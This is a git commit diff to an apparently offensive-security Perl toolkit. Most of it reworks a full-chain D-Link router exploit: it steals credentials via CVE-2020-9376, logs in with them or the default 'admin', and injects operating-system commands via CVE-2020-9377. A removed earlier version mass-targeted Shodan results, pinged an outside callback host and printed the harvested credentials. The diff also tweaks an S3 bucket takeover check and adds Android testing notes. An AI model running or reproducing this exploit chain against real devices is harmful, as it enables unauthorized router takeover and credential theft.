Develop (#111)

* remove duplicate module

* new module

* fixes and more flexibility

* change name of the module

* notes

* add a new pattern to detect more cases

* draft module

.config/modules.json

@@ -285,7 +285,7 @@
         {  
             "id": "0048",
             "category": "recon",
-            "module": "Technologies",
+            "module": "Detect_Tech",
             "description": "Detect the stack of a web application"
         },
         {  
@@ -377,12 +377,6 @@
             "category": "advisory",
             "module": "CVE_2024_4577",
             "description": "PHP CGI Argument Injection vulnerability"
-        },
-        {
-            "id": "0063",
-            "category": "advisory",
-            "module": "CVE_2021_41174",
-            "description": "Grafana Reflected XSS"
         }
     ]
 }

cpanfile

@@ -7,4 +7,6 @@ requires "Net::DNS", "1.34";
 requires "WWW::Mechanize", "2.11";
 requires "Net::IP";
 requires "UUID::Tiny", "1.04";
-requires "Redis";
+requires "WWW::Mechanize";
+requires "WWW::Wappalyzer";
+requires "Redis";

lib/Spellbook/Android/notes.txt

@@ -0,0 +1,18 @@
+read the source code searching for insecure connections, like HTTP, WS, FTP, SMTP;
+Search for private keys (criptography or simple secrets);
+    SECRET_KEY
+LFI/ Private file access
+Unprotected activities
+Unprotected services
+Intent redirection
+Incorrect URL verification
+Cross-app scripting
+Deep link
+    - CSRF
+    - Open redirection
+    - XSS
+    - LFIs
+
+AndroidManifest.xml
+- resources.arsc/strings.xml
+- res/xml/file_paths.xml

lib/Spellbook/Exploit/Fullchain_DLINK.pm

@@ -4,66 +4,62 @@ package Spellbook::Exploit::Fullchain_DLINK {
     use HTTP::Request;
     use HTTP::Headers;
     use LWP::UserAgent;
-    use Spellbook::Recon::Shodan;
+    use Spellbook::Recon::Query_Shodan;
     use Spellbook::Advisory::CVE_2020_9376;
     use Spellbook::Advisory::CVE_2020_9377;
 
     sub new {
         my ($self, $parameters) = @_;
-        my ($help, $target, @results);
+        my ($help, $target, $payload, @results);
 
         Getopt::Long::GetOptionsFromArray (
             $parameters,
-            "h|help"     => \$help,
-            "t|target=s" => \$target
+            "h|help"      => \$help,
+            "t|target=s"  => \$target,
+            "p|payload=s" => \$payload
         );
 
         if ($target) {
-            my @targets = Spellbook::Recon::Shodan -> new (["--target" => 1]);
-
-            foreach my $router (@targets) {
-                my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $router]);
+            if ($target !~ /^http(s)?:\/\//x) {
+                $target = "http://$target";
+            }
 
-                if ($credentials) {
-                    my ($username, $password) = split /:/, $credentials;
+            my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]);
 
-                    if (!$password) { $password = "admin"; }
+            if ($credentials) {
+                my ($username, $password) = split /:/, $credentials;
 
-                    if ($username) {
-                        if ($router !~ /^http(s)?:\/\//x) {
-                            $router = "http://$router";
-                        }
+                if (!$password) { 
+                    $password = "admin";
+                }
 
-                        my $userAgent = LWP::UserAgent->new();
-                        my $payload   = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";
+                if ($username) {
+                    my $userAgent = LWP::UserAgent->new();
+                    my $payload   = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";
 
-                        my $headers   = HTTP::Headers->new (
-                            "Content-Type" => "application/x-www-form-urlencoded",
-                            "Cookie" => "uid=dLktm5OJdn",
-                            "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0",
-                            "Accept" => "*/*",
-                            "Accept-Language" => "en-US,en;q=0.5",
-                            "Accept-Encoding" => "gzip, deflate",
-                            "Origin" => "$router",
-                            "Referer" => "$router/",
-                            "Connection" => "keep-alive"
-                        );
+                    my $headers   = HTTP::Headers->new (
+                        "Content-Type" => "application/x-www-form-urlencoded",
+                        "Cookie" => "uid=zwUEueUOvi",
+                        "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0",                            "Accept" => "*/*",
+                        "Accept-Language" => "en-US,en;q=0.5",
+                        "Accept-Encoding" => "gzip, deflate",
+                        "Origin" => $target,
+                        "Referer" => $target,
+                        "Connection" => "keep-alive"
+                    );
 
-                        my $request   = HTTP::Request -> new("POST", "$router/session.cgi", $headers, $payload);
-                        my $response  = $userAgent -> request($request);
+                    my $request   = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload);
+                    my $response  = $userAgent -> request($request);
 
-                        if ($response -> is_success) {                            
-                            my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([
-                                "--target" => $router,
-                                "--cookie" => "dLktm5OJdn",
-                                "--payload" => "ping h4mm16zegmqhsuhuatu0j6ged5jw7nvc.oastify.com"
-                            ]);
+                    if ($response -> is_success) {   
+                        my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([
+                            "--target" => $target,
+                            "--cookie" => "zwUEueUOvi",
+                            "--payload" => "uname -a"
+                        ]);
 
-                            if ($exploit[0] ne "Authenication fail") {
-                                print "$router => $username / $password / dLktm5OJdn\n";
-
-                                push @results, @exploit;
-                            }
+                        if ($exploit[0] ne "Authenication fail") {
+                            push @results, @exploit;
                         }
                     }
                 }
@@ -77,7 +73,8 @@ package Spellbook::Exploit::Fullchain_DLINK {
                 \rExploit::Fullchain_DLINK
                 \r=======================
                 \r-h, --help     See this menu
-                \r-t, --target   Define a target\n\n";
+                \r-t, --target   Define a target
+                \r-p, --payload  Send a command\n\n";
         }
 
         return 0;

lib/Spellbook/Exploit/S3_Bucket_Takeover.pm

@@ -15,13 +15,16 @@ package Spellbook::Exploit::S3_Bucket_Takeover {
 
         if ($target) {
             if ($target !~ /^http(s)?:\/\//x) {
-                $target = "https://$target";
+                $target = "http://$target";
             }
 
             my $userAgent = Spellbook::Core::UserAgent -> new();
             my $request = $userAgent -> get($target);
 
-            if ($request -> code() == 404 && $request-> content() =~ m/Code: NoSuchBucket/x) {
+            if (
+                ($request -> code() == 404) &&
+                (($request-> content() =~ m/Code: NoSuchBucket/x) || ($request-> content() =~ m/<Code>NoSuchBucket<\/Code>/x))
+            )  {
                 push @result, $target;
             }
 

lib/Spellbook/Recon/Technologies.pm

@@ -47,4 +47,4 @@ package Spellbook::Recon::Technologies {
     }
 }
 
-1;
+1;